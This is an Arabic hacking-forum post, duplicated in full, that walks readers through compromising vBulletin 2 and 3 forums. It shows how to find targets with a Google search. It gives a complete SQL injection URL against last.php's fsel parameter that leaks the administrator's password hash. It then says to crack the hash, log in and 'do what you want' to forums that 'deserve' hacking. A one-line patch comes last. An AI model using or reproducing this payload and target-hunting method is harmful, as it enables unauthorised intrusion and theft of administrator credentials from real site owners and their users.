همام
11-14-2005, 03:55 AM
http://www.alfawda.com/prog/bism.gif
السلام عليكم ورحمة الله وبركاته
الموضوع ممتاز ومجرب وفيه تقدر تخترق المنتديات بجميع الاصدارات 2 3
ولذا أبرء نفسي من أي أستخدام خاطئ لهذة الثغره
ونرجو أن أخترقتم فتخترقوا منتديات تستحق الاختراق
هذا الثغره
الثغرة في : منتديات vBulletin
الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3
ملف الثغرة : أخر عشر مواضيع
طريقة الإختراق :
إذهب إلى أي محرك بحث مثل google.com
وأكتب :
powered by: vbulletin version 3
أو
powered by: vbulletin version 2
إختر أحد المنتديات اللتي ظهرت لك ثم ضع بعد رابط المنتدى مباشرة هذا الكود
last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201/*
بعد المنتدى مباشرة
بحيث يكون
http://www/.[target].com/vb/last.php?fsel=,user.password%20as%20title,user.%20 username%20as%20lastposter%20FROM%20user,thread%20 %20WHERE%20usergroupid=6%20LIMIT%201/*
مع العلم ان target
هي اسم الموقع المراد أختراقه
مع ملاحظة أن بعض المنتديات اسم ملف أخر المواضيع مختلف عندها مثلاً : ttlast.php / last10.php / last.php
بعد إضافة الكود إضغط إنتر وسوف يظهر لك باسورد المشرف العام في شريط اخر المواضيع
وبعدها يطلع لك الباسوورد المشفر للمنتدى مع المشرف العام
ما عليك الا أستخدام أي برنامج لفك الشفره والدخول الى المنتدى
وبعد فك التشفير ماعليك إلا أن تدخل المنتدى وتسوي اللي تبيه ولكن تذكر أن الله يراك
لذا إن إخترقت منتدى فليكن يستحق الإختراق
طريقة إغلاق الثغرة إفتح ملف أخر عشر مواضيع وابحث عن الدالة $fsel واحذفها فقط .
http://www.alfawda.com/prog/zoon.gif
اخوكم / همام هكر
السلام عليكم ورحمة الله وبركاته
الموضوع ممتاز ومجرب وفيه تقدر تخترق المنتديات بجميع الاصدارات 2 3
ولذا أبرء نفسي من أي أستخدام خاطئ لهذة الثغره
ونرجو أن أخترقتم فتخترقوا منتديات تستحق الاختراق
هذا الثغره
الثغرة في : منتديات vBulletin
الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3
ملف الثغرة : أخر عشر مواضيع
طريقة الإختراق :
إذهب إلى أي محرك بحث مثل google.com
وأكتب :
powered by: vbulletin version 3
أو
powered by: vbulletin version 2
إختر أحد المنتديات اللتي ظهرت لك ثم ضع بعد رابط المنتدى مباشرة هذا الكود
last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201/*
بعد المنتدى مباشرة
بحيث يكون
http://www/.[target].com/vb/last.php?fsel=,user.password%20as%20title,user.%20 username%20as%20lastposter%20FROM%20user,thread%20 %20WHERE%20usergroupid=6%20LIMIT%201/*
مع العلم ان target
هي اسم الموقع المراد أختراقه
مع ملاحظة أن بعض المنتديات اسم ملف أخر المواضيع مختلف عندها مثلاً : ttlast.php / last10.php / last.php
بعد إضافة الكود إضغط إنتر وسوف يظهر لك باسورد المشرف العام في شريط اخر المواضيع
وبعدها يطلع لك الباسوورد المشفر للمنتدى مع المشرف العام
ما عليك الا أستخدام أي برنامج لفك الشفره والدخول الى المنتدى
وبعد فك التشفير ماعليك إلا أن تدخل المنتدى وتسوي اللي تبيه ولكن تذكر أن الله يراك
لذا إن إخترقت منتدى فليكن يستحق الإختراق
طريقة إغلاق الثغرة إفتح ملف أخر عشر مواضيع وابحث عن الدالة $fsel واحذفها فقط .
http://www.alfawda.com/prog/zoon.gif
اخوكم / همام هكر